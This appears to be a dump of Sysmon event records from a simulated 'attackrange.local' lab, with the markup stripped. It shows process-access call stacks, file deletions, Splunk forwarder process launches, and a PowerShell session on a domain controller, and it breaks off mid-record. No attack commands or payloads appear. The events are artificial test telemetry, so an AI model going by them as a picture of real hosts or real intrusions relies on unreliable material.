Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808524Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.416{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5C11E2ECABBE70F5711B0795B4C601B,SHA256=1401F6B5A62A9170245C7B10E5BC55465753299F925CA079DF49E10053F6B24F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}8472ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf6e0c09.TMPMD5=188226775E73527BA9F246638922D33D,SHA256=44D88392EAC5CF01F5BDB2D7E5F2991301D5C34AAB9FFC561E2B376D14959354,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808523Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.197{0C1E0330-F5E7-60EB-9A79-00000000D001}12882464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808522Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.041{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E7-60EB-9A79-00000000D001}1288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808521Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.041{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808520Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.041{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808519Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.041{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808518Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.025{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808517Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.025{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808516Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.025{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808515Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.025{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808514Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.025{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808513Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.025{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808512Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.025{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F5E7-60EB-9A79-00000000D001}1288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808511Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.025{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E7-60EB-9A79-00000000D001}1288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808510Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.026{0C1E0330-F5E7-60EB-9A79-00000000D001}1288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.913{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AE7234FDD347460AF2622C429BA0E5E,SHA256=A8A27944959266304DDD6C252B0C5F0D681AD87FE0F9EE46639945FE87010C52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808555Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.556{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAE41EEC71DD43165E433B46AE5EC8F7,SHA256=F48CC6B5EA2886585AC6A2BAFA73D4AC582CE9859F0C8F07886AC571D0960AA2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808554Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.525{0C1E0330-F5E8-60EB-9C79-00000000D001}38242292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.460{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 